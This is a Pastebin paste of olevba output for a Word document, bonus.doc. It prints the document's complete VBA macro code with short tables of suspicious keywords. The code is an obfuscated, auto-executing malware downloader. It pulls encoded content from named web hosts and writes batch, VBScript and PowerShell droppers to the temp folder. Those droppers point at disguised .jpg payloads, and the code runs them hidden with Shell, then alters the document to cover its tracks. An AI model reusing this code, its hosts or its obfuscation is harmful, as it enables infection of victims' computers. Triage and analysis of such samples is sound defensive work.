Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- olevba 0.26 - http://decalage.info/python/oletools
- Flags Filename
- ----------- -----------------------------------------------------------------
- OLE:MAS-HB- bonus.doc
- (Flags: OpX=OpenXML, XML=Word2003XML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, ?=Unknown)
- ===============================================================================
- FILE: bonus.doc
- Type: OLE
- -------------------------------------------------------------------------------
- VBA MACRO ThisDocument.cls
- in file: bonus.doc - OLE stream: u'Macros/VBA/ThisDocument'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Sub Dqwkdojqwiodqw_Open()
- End Sub
- Sub Ejoqiwjdioqwjdqo_Open()
- End Sub
- Sub Auto_Open()
- Djiqowjdwoiqjdqwo
- End Sub
- Sub Djiqowjdwoiqjdqwo()
- UQHDIQWHD = "1j2h eiuh1k2jeh21kjeh jk12g ehj12g"
- Xjqwidjowqjdq
- End Sub
- Sub Giqjwdhqwkjq()
- DQUHWDIWQ = "eji21h ui21he21"
- End Sub
- Sub AutoOpen()
- Auto_Open
- End Sub
- Sub Workbook_Open()
- NJQWBDJQKW = "j2hge h1hj1g2 hj21gje "
- Auto_Open
- End Sub
- Sub Xjqwidjowqjdq()
- Dim fallout As Integer, silkroad As Integer, inclife As Integer, inredible As Integer
- Dim retVal As Variant, gana As Integer, turkey As Integer, malay As Integer, SPAIN As String, BOLIVIA As String
- BOLIVIA = Chr(90 + 2)
- ANGOLA = Ubqhwdhwqbd(15425) + ""
- SPAIN = Chr(84) & "em" + "p"
- QHDQUWH = ANGOLA
- FL2 = QHDQUWH
- PH2 = Module2.Goabc(SPAIN) + BOLIVIA
- silkroad = 9
- jwnqdw = -1
- BOSNIA = 12312312
- BOSNIA = 1 + 1 + 113 + Sgn(jwnqdw)
- BALAGAN = BOSNIA
- TROYA = "banbv2dbgh21f gd2h1f21ghfd gh12fgh1t"
- JWIDJIAAA = ""
- HUYFEA = "gdhjqwg hqjwgdhjqwg hjqwgdhjqwg"
- QIWJDABB = "b"
- HUYFEA = QIWJDABB + "a" + "t"
- IUQJWD = "bjgqhdhjg21jhgdhj1g jh1eg hj21ge j2h"
- PSFL = FL2 + "" & "" + "." + "p" + "" + Chr(115) + Chr(49)
- gana = NUqwdqwbdsad(1 - 300 * Sin(20))
- SSS = Chr(BALAGAN + 2 + gana)
- VBFL = FL2 + Chr(50 - 4) + "v" + "" + "" & "b" & "" & SSS & ""
- BAFL = FL2 + Chr(NUqwdqwbdsad(Fix(-22.043)) + 31 - 10 + 25 + gana + 2) + HUYFEA
- INTG = "" & "o" & "bject"
- KIWD = Chr(110 + NUqwdqwbdsad(Len(BAFL))) + "dule"
- AFTG = Chr(109) & KIWD
- SXEE = Chr(46)
- SXAA = Chr(101)
- SXE = SXEE & SXAA & "" & "xe"
- GNG = Chr(2 ^ 2 + 42) + "jpg"
- HUQD = Chr(30 + 16 + 1)
- ATTH = "ht" & "t" & "" & "p" & ":" & "/" & Chr(47)
- BQHJDQ = "sav" + "epic" & Chr(46) & "su" + HUQD
- PSPTH = PH2 + PSFL
- VBPTH = PH2 + VBFL
- BAPTH = "1hj2gehj12g1h f2gh112 feg1h2f e"
- ABPTH = PH2 + BAFL
- BAPTH = ABPTH
- JHQKWDQAASS = BQHJDQ
- Dim BALAGANHUQW As Integer, DRT As Integer, BFT As Integer, CFT As Integer, DFT As Integer, EFT As Integer, CONT As String
- DRT = 315
- BFT = 316
- CFT = 317
- DFT = 318
- EFT = 319
- Dim NUWDHUQHUQWDH As String
- NUWDHUQHUQWDH = "USE" & "RPROFILE"
- Dim PBIn As String, asdwq As String, MIWDWQ As String
- TSTS = "." + "t" + "xt"
- CDDD = "78672738612836" + TSTS
- LNSS = "p" & "a" & "p" & "a" & "" + TSTS
- STT1 = "www.buck.tv/cms/w" & "p-co" & "ntent/up" & "loads/"
- STT2 = "www.bereciartua.com/w" & "p-cont" & "ent/th" & "emes/bere" & "ciartua/"
- PBIn = ATTH + STT1 + CDDD
- CONT = Module2.Linolium(PBIn)
- asdwq = Rasdas(CONT)
- HQUWDAAA = "0"
- If (asdwq <> "=") Then
- PBIn = ATTH + STT2 + CDDD
- CONT = Module2.Linolium(PBIn)
- asdwq = CONT
- HQUWDAAA = "1"
- End If
- CONT = Quqhwdbyas(asdwq)
- Dim ahuywdgqy As String
- TVT10 = Port(CONT, "t" & "ext10")
- TVT20 = Port(CONT, "t" & "ext20")
- TVT21 = Port(CONT, "t" & "ext21")
- TVT30 = Port(CONT, "t" & "ext30")
- TVT31 = Port(CONT, "t" & "ext31")
- XPT1 = Port(CONT, "stext1")
- XPT2 = Port(CONT, "stext2")
- XPT3 = Port(CONT, "stext3")
- WVR = Module2.Goabc(NUWDHUQHUQWDH)
- hufehu1 = InStr(WVR, "sers\")
- Dim hudhw As Integer
- Dim ghdAdd(1 To 3)
- ghdAdd(1) = "1"
- ghdAdd(2) = "0"
- ghdAdd(3) = "0"
- If (hufehu1 <> 0) Then
- ghdAdd(1) = "2"
- Else
- ghdAdd(2) = "3"
- End If
- JHWQUD = Join(ghdAdd)
- hudhw = Val(JHWQUD)
- Module2.WaitFor (1)
- MIWDWQ = ATTH + STT1 + LNSS
- If (HQUWDAAA = "1") Then
- MIWDWQ = ATTH + STT2 + LNSS
- End If
- SEXX = Module2.Linolium(MIWDWQ)
- PSTB = PBIn + "123123123"
- MSTAR1 = JHQKWDQAASS + "5751812" + GNG
- MSTAR2 = JHQKWDQAASS + "5757956" + GNG
- STAR1 = ATTH + MSTAR1
- STAR2 = ATTH + MSTAR2
- FFQ = "8"
- FF = FFQ + SXE
- If (hudhw = 130) Then
- Open BAPTH For Output As #DRT
- Print #DRT, XPT1
- Print #DRT, ":jadkjasghdjasg" & vbCrLf & "set trfd=" + Chr(34) + PH2 + Chr(34)
- Print #DRT, "set nmsj=" + Chr(34) + FL2 + Chr(34)
- Print #DRT, "set exds=" + Chr(34) + FFQ + Chr(34)
- Print #DRT, XPT2
- Close #DRT
- Module2.WaitFor (1)
- Open VBPTH For Output As #BFT
- Print #BFT, "strRT = " + Chr(34) + SEXX + Chr(34)
- Print #BFT, "statRT = " + Chr(34) + STAR1 + Chr(34)
- Print #BFT, "" & "jfeu" & "ygq = " + Chr(34) & "" + FF + Chr(34) & ""
- Print #BFT, "strTecation = " + Chr(34) + PH2 + Chr(34) + "+jfeuygq"
- Print #BFT, XPT3
- Close #BFT
- BDDT.WaitFor (1)
- NTH1 = Module3.HowEver(retVal, BAPTH)
- End If
- HUDQG = "';"
- If (hudhw = 200) Then
- ZPQSKD = FL2
- Open PSPTH For Output As #CFT
- Print #CFT, "$nqjkwdnq = 'qiwdqwhd';"
- Print #CFT, "$ndqbwdwqs = 'jqwdnjkqwhd';"
- Print #CFT, "$stat = 'ht'+'tp://'+''+'" + MSTAR2 + "';"
- Print #CFT, "$ggtt = '" + SEXX + "';"
- Print #CFT, "$pths = '" + PH2 + HUDQG
- Print #CFT, "$wehs = '" + ZPQSKD + HUDQG
- Print #CFT, "$nnm = '" + FFQ + "';"
- Print #CFT, TVT10
- Close #CFT
- Open VBPTH For Output As #DFT
- Print #DFT, TVT30
- Print #DFT, "c" + "urrentFile = " + Chr(34) + PH2 + Chr(34) + "&" + Chr(34) + FL2 + Chr(34) + "&huih"
- Print #DFT, TVT31
- Close #DFT
- Open BAPTH For Output As #EFT
- Print #EFT, Chr(30 + 30 + 4) + "echo off" & vbCrLf & ":jqduqihdjsakd"
- Print #EFT, TVT20
- Print #EFT, "set Ads3=" + Chr(34) + FL2 + Chr(34)
- Print #EFT, ":nqudiiqhdjkashd"
- Print #EFT, "set Mts4=" + Chr(34) + PH2 + Chr(34)
- Print #EFT, ":nqjdkbjkbdhjqwb"
- Print #EFT, "set Rts4=" + "%Mts4%%Ads3%"
- Print #EFT, TVT21
- Close #EFT
- Module2.WaitFor (1)
- NTH2 = Module3.HowEver(retVal, BAPTH)
- End If
- JUW = Chr(47)
- AKK = Chr(60)
- ZKK = ">"
- NTH3 = Module3.India(AKK + INTG + ZKK, AKK & JUW + INTG + ZKK, 1)
- NTH4 = Module3.India(AKK + AFTG + ZKK, AKK + JUW + AFTG + ZKK, 2)
- NTH5 = Module3.India(AKK + INTG + ZKK, "", 3)
- NTH6 = Module3.India(AKK + JUW + INTG + ZKK, "", 3)
- NTH7 = Module3.India(AKK + AFTG + ZKK, "", 3)
- NTH8 = Module3.India(AKK + JUW + AFTG + ZKK, "", 3)
- End Sub
- Public Function NUqwdqwbdsad(a As Integer)
- NUqwdqwbdsad = Sgn(a)
- End Function
- Public Function Hhqudhqwgyuqwaaa(a As Integer)
- Hhqudhqwgyuqwaaa = Sgn(a)
- End Function
- Public Function Ubqhwdhwqbd(a As Integer)
- Ubqhwdhwqbd = CStr(Int((a * Rnd) + 10000))
- End Function
- Public Function Quqhwdbyas(ByVal strData As String) As String
- Dim objXML As Object
- Dim objNode As Object
- Dim asduiwhqdqiw As Integer, nudqwd As Integer, sshquwdq As Integer
- nudqwd = Log10(100)
- asduiwhqdqiw = Hhqudhqwgyuqwaaa(1 - nudqwd)
- QHDHUQW = "" & Chr(78 + asduiwhqdqiw) + "SXML2.DOMDocument"
- Set objXML = CreateObject(QHDHUQW)
- Set objNode = objXML.createElement("b6" + "4")
- objNodeS = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
- objNodeE = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
- objNodeQ = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
- objNodeZ = "1m2hjkh12 jghehj1gehj12ge j12j1he12"
- objNode.DataType = "bin.b" + Chr(97) + "se" + "6" & "4"
- objNode.Text = strData
- WUDHA = objNode.nodeTypedValue
- Quqhwdbyas = WUDHA
- Set objNode = Nothing
- Set objXML = Nothing
- End Function
- Public Function Port(a, b As String)
- Dim krd, tent As Integer
- UQWD = "" & Chr(58 + 2)
- NDUW = "" & Chr(70 - 8)
- krd = InStr(1, a, UQWD + b + NDUW) + 8
- tent = InStr(1, a, UQWD + "/" + b + NDUW) - krd
- KLMN = Mid$(a, krd, tent)
- HUQHWDA = KLMN
- Port = HUQHWDA
- End Function
- Private Static Function Rasdas(a As String)
- Rasdas = Right(a, 1)
- End Function
- Private Static Function Log10(x)
- SWOPJDQIOW = "jqhw gdhjg12hjgd21g21d"
- Log10 = Log(x) / Log(10#)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+----------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+----------------+-----------------------------------------+
- | AutoExec | AutoOpen | Runs when the Word document is opened |
- | AutoExec | Auto_Open | Runs when the Excel Workbook is opened |
- | AutoExec | Workbook_Open | Runs when the Excel Workbook is opened |
- | Suspicious | Open | May open a file |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Output | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Print # | May write to a file (if combined with |
- | | | Open) |
- | Suspicious | Hex Strings | Hex-encoded strings were detected, may |
- | | | be used to obfuscate strings (option |
- | | | --decode to see all) |
- | Suspicious | Base64 Strings | Base64-encoded strings were detected, |
- | | | may be used to obfuscate strings |
- | | | (option --decode to see all) |
- +------------+----------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module1.bas
- in file: bonus.doc - OLE stream: u'Macros/VBA/Module1'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function Xjdkhjfwefw(a As Object)
- Xjdkhjfwefw = (a.responseText)
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- No suspicious keyword or IOC found.
- -------------------------------------------------------------------------------
- VBA MACRO Module2.bas
- in file: bonus.doc - OLE stream: u'Macros/VBA/Module2'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function Goabc(sps As String)
- QBYDGQWDWQ = "1hj2ehjg 1h2fegh12fehg12 " & "j1g2ehj21g 21"
- QBYADGQWDWQ = "1sdhj2ehjg 1h2fegh12fehg12 " & "j1g2ehj21g 21"
- QBYXDGQWDWQ = "1hj2ehjdsg 1h2fegh12fehg12 " & "j1g2ehj21g 21"
- Goabc = Environ(sps)
- End Function
- Public Function Linolium(nbqjbdjqw As String)
- Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, Kjqiwdhqwuhdjqkwhdjkqwbd As Object, AHUDWQI As String
- Dim ashdUHhda As String, hausd As Integer
- ashdUHhda = nbqjbdjqw
- hausd = Sgn(0 - Abs(Cos(140)))
- BQDHJQWDGWQJGS = "MSXML2.ServerXMLH" & Chr(85 + hausd) & Chr(84) & Chr(80)
- 'MsgBox (BQDHJQWDGWQJGS)
- Set Kjqiwdhqwuhdjqkwhdjkqwbd = CreateObject(BQDHJQWDGWQJGS)
- Kjqiwdhqwuhdjqkwhdjkqwbd.Open "GE" & "" & "T", ashdUHhda
- Kjqiwdhqwuhdjqkwhdjkqwbd.Send (AHUDWQI)
- Linolium = Module1.Xjdkhjfwefw(Kjqiwdhqwuhdjqkwhdjkqwbd)
- End Function
- Sub WaitFor(NumOfSeconds As Long)
- Dim SngSec As Long
- SngSec = Timer + NumOfSeconds
- Do While Timer < SngSec
- DoEvents
- Loop
- End Sub
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+--------------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+--------------+-----------------------------------------+
- | Suspicious | Open | May open a file |
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | CreateObject | May create an OLE object |
- | Suspicious | Environ | May read system environment variables |
- +------------+--------------+-----------------------------------------+
- -------------------------------------------------------------------------------
- VBA MACRO Module3.bas
- in file: bonus.doc - OLE stream: u'Macros/VBA/Module3'
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- Public Function India(dnuwhd As String, b As String, c As Integer)
- Dim selectedText As String
- Dim ssjidoqwhduqhwidqwudihq As Range, lesleslesqjhdjqkwhdwq As Range
- Set ssjidoqwhduqhwidqwudihq = ActiveDocument.Range
- HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
- HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
- With ssjidoqwhduqhwidqwudihq.Find
- 'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
- 'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
- .Text = dnuwhd
- .MatchWholeWord = True
- ssjidoqwhduqhwidqwudihq.Find.Execute
- ssjidoqwhduqhwidqwudihq.Collapse direction:=wdCollapseEnd
- Dim wdwq As String
- Set lesleslesqjhdjqkwhdwq = ActiveDocument.Range
- Dim wdsadwq As String
- lesleslesqjhdjqkwhdwq.Start = ssjidoqwhduqhwidqwudihq.End
- .Text = b
- .MatchWholeWord = True
- .Execute
- RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
- RHQHDQWUHDQKW = "h1j2he kh12jgh12 feg21fgeh12fjy"
- ssjidoqwhduqhwidqwudihq.Collapse direction:=wdCollapseStart
- lesleslesqjhdjqkwhdwq.End = ssjidoqwhduqhwidqwudihq.Start
- If (c = 1) Then
- selectedText = lesleslesqjhdjqkwhdwq.Delete
- End If
- If (c = 2) Then
- lesleslesqjhdjqkwhdwq.Font.Color = wdColorBlack
- End If
- Dim hduwaa As Integer
- hduwaa = 1 - 2 ^ 4
- QHUDW = Chr(33 + Sgn(hduwaa))
- If (c = 3) Then
- With ssjidoqwhduqhwidqwudihq.Find
- .Text = a
- .Replacement.Text = QHUDW
- 'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
- 'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
- 'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
- 'HQUDGYGASDHJ = "be2hv1g12vhgf1 gdef 12dge"
- .Wrap = wdFindContinue
- .Execute Replace:=wdReplaceAll
- End With
- End If
- End With
- End Function
- Public Function HowEver(a As Variant, b)
- VGQDVHQWD = "h2eh1 fg12e"
- a = Shell(b, 0)
- HowEver = a
- End Function
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
- ANALYSIS:
- +------------+---------+-----------------------------------------+
- | Type | Keyword | Description |
- +------------+---------+-----------------------------------------+
- | Suspicious | Chr | May attempt to obfuscate specific |
- | | | strings |
- | Suspicious | Shell | May run an executable file or a system |
- | | | command |
- +------------+---------+-----------------------------------------+
Add Comment
Please, Sign In to add comment